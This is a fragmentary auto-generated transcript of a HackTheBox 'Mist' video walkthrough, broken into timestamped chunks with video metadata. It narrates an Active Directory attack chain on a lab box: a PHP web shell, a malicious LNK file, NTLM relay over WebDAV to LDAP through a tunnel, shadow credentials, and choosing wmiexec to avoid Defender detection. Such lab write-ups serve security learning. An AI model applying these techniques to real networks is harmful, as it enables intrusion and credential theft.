good website I use the hacker recipes um this is a lot of good like ad attack um stuff so I would highly recommend if you're learning ad and want like um AAR all the things or hack tricks for a bunch of just like running commands this is like a gold mine so we use this new ad uh adns node uh let's do like this node we'...
3,042.2
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
for a second time let's see Di is the shell still active please say the Shell's active it's probably not and that's going to be a pain um I think we have to get a shell again going to copy this we'll close that v lnk um wrong clipboard there we go then five that looks right okay we're already listening okay I'm going t...
3,113
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
zip unzip uh 7zx MV shell shell. PHP there we go so we should now just be able to get shell. PHP off the root of the server and as we saw the Bloodhound data didn't get deleted so data should not be deleted off of that but did it not save PWD I'm there WR at di find string shell that is Echo one am I doing a 404 it is ...
3,201.72
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
PHP there we go let's copy shell. PHP 1 2 3 4 did that do it that looks better okay so if I ever need to get a shell again it won't be as painful okay we have to switch back to Brandon lnk Dove we should put that in this okay so now we got to wait for Brandon to click the link and then we can move on right I guess we c...
3,305.64
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
also do um ldap D Checker and this is going to tell us if ldap signing is enabled or not and if it's enabled then this attack will not work we won't be able to do any type of relaying but since ldap signing is not enforced we can do this relay attack and this is going to get really complex because like the attack's goi...
3,403.4
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
we're going to use wmi exact because PS exact gets picked up by Defender like that's why we want to get to this state but to get to this state of getting ms01 ntlm it is going to be somewhat complex because it is going to involve relaying to ldap and Shadow credentials and a bunch of other things so let's try to explai...
3,461.799
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
installed because that's by default I think it's going away in future builds but we can turn this request into a web DAV request and that's key because if this was just SMB the only thing we could relay to dco1 would be another SMB thing and since SMB signing is enabled um we can't relay it but because we can force ms0...
3,519.64
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
user essentially so it's going to be a little bit more difficult than this because we can't create DNS entries if we could create a DNS entry that points to us then it would work just like this but because we can't we have to do a little bit of trickery with network routing so what we're going to do is stand up a um li...
3,580.88
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
have a socks proxy that goes through ms01 that enables us to talk to dco1 as ldap right and then we do the clear credential attack in order to gain access so that's essentially what we're going to be doing um hopefully it makes sense if it doesn't um before you watch it like five times or my explanation five times uh l...
3,641.599
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
um net st- find string 5050 it is listening so what I'm going to do real quick let's just listen on Port 80 to verify this tunnel is up so if I do a curl on 1271 Port 80 we probably have to specify HTTP please work uh no 50/50 so we're going to go through the tunnel right so 50/50 and yes we get it and remember this is...
3,717
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
Shadow and then we're going to grab this branch and then there's a funny comment here we are here from hdb missed but let's go ahead and grab this so we'll do a get clone on this and we'll specify the branch um can I just copy this we'll just type it interactive ldap Shadow creds interactive L Shadow creds okay and the...
3,787.76
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
pack it here okay we can do pip three install Dot and I think anlm relay is a part of impa yet it could be part of a different one uh let's see find. grap nlm relay see NM I think that's good so that's set up so what we're going to have to do is stand up our relay so to do that I'm going to say um proxy chains ntlm rel...
3,880.76
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
we can go in here and there is an executable um I had a lot of trouble getting this to work like I had the relay working um on the box but for some reason it never like was the system user so I didn't get permission so I couldn't do the shadow credential part if you could get this executable working as the python one i...
3,986.599
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }